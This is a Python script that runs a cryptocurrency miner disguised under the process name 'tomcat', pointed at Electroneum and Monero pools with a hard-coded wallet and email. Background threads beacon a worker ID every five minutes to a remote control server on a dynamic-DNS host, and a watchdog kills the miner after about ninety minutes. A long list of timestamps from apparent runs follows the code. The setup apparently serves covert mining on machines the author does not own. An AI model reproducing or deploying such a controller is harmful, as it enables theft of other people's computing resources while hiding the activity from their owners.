import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:06.123299
#2018-02-17 16:04:01.408831
#2018-02-17 17:51:07.815749
#2018-02-17 19:38:04.803585
#2018-02-17 21:26:01.583988
#2018-02-17 23:10:07.351884
#2018-02-18 00:57:03.579243
#2018-02-18 02:45:08.414389
#2018-02-18 04:34:02.010800
#2018-02-18 06:24:07.525604
#2018-02-18 08:14:04.028650
#2018-02-18 10:02:05.111793
#2018-02-18 11:48:01.927731
#2018-02-18 13:33:02.022547
#2018-02-18 15:23:04.692952
#2018-02-18 17:13:07.266238
#2018-02-18 19:01:07.592889
#2018-02-18 20:48:02.014811
#2018-02-18 22:35:01.750986
#2018-02-19 00:23:05.081466
#2018-02-19 02:08:07.352597
#2018-02-19 03:55:07.483188
#2018-02-19 05:40:08.724717
#2018-02-19 07:28:05.142360
#2018-02-19 09:18:06.299997
#2018-02-19 11:07:02.016275
#2018-02-19 12:54:01.672989
#2018-02-19 14:43:09.451211
#2018-02-19 16:32:07.844706
#2018-02-19 18:18:04.192147
#2018-02-19 20:06:01.991458
#2018-02-19 21:54:07.069337
#2018-02-19 23:39:05.105334
#2018-02-20 01:26:07.220089
#2018-02-20 03:15:07.019535
#2018-02-20 05:01:05.702064
#2018-02-20 06:43:06.488372
#2018-02-20 08:28:06.005627
#2018-02-20 10:13:01.276368
#2018-02-20 11:57:04.335261
#2018-02-20 13:44:04.858990
#2018-02-20 15:31:09.624922
#2018-02-20 17:16:07.670073
#2018-02-20 19:07:01.549788
#2018-02-20 20:57:01.268006
#2018-02-20 22:41:04.070421
#2018-02-21 00:22:06.914439
#2018-02-21 02:07:01.246383
#2018-02-21 03:55:07.553350
#2018-02-21 05:43:01.452812
#2018-02-21 07:31:01.348751
#2018-02-21 09:16:01.804898
#2018-02-21 11:05:03.979399
#2018-02-21 12:53:09.690666
#2018-02-21 14:40:09.478640
#2018-02-21 16:26:07.579962
#2018-02-21 18:18:09.749717
#2018-02-21 20:04:01.824743
#2018-02-21 21:51:08.856660
#2018-02-21 23:37:03.999869
#2018-02-22 01:24:07.606774
#2018-02-22 03:13:02.147549
#2018-02-22 04:59:03.590002
#2018-02-22 06:42:07.547737
#2018-02-22 08:31:01.491928
#2018-02-22 10:18:01.920320
#2018-02-22 12:02:10.267661
#2018-02-22 13:48:10.586580
#2018-02-22 15:37:05.874347
#2018-02-22 17:22:04.365504
#2018-02-22 19:08:07.351622
#2018-02-22 21:01:01.652208
#2018-02-22 22:46:04.951896
#2018-02-23 00:33:01.380734
#2018-02-23 02:19:04.209222
#2018-02-23 04:09:01.835242
#2018-02-23 05:55:02.711461
#2018-02-23 07:36:04.186828
#2018-02-23 09:39:01.488470
#2018-02-23 11:44:01.588578
#2018-02-23 13:33:08.621536
#2018-02-23 15:18:05.622431
#2018-02-23 17:05:11.972586
#2018-02-23 18:53:07.322670
#2018-02-23 20:40:08.882138
#2018-02-23 22:28:05.088609
#2018-02-24 00:14:01.962148
#2018-02-24 02:06:04.219638
#2018-02-24 03:37:06.168468
#2018-02-24 05:11:01.482344
#2018-02-24 06:47:05.407356
#2018-02-24 08:20:03.936417
#2018-02-24 09:48:06.349504
#2018-02-24 11:33:01.939930
#2018-02-24 12:59:03.429484
#2018-02-24 14:33:07.525886
#2018-02-24 16:02:06.678505
#2018-02-24 17:46:01.172185
#2018-02-24 19:14:07.774551
#2018-02-24 20:47:06.027143
#2018-02-24 22:33:05.692541
#2018-02-25 01:42:01.538183
#2018-02-25 05:28:04.751765
#2018-02-25 11:35:05.088944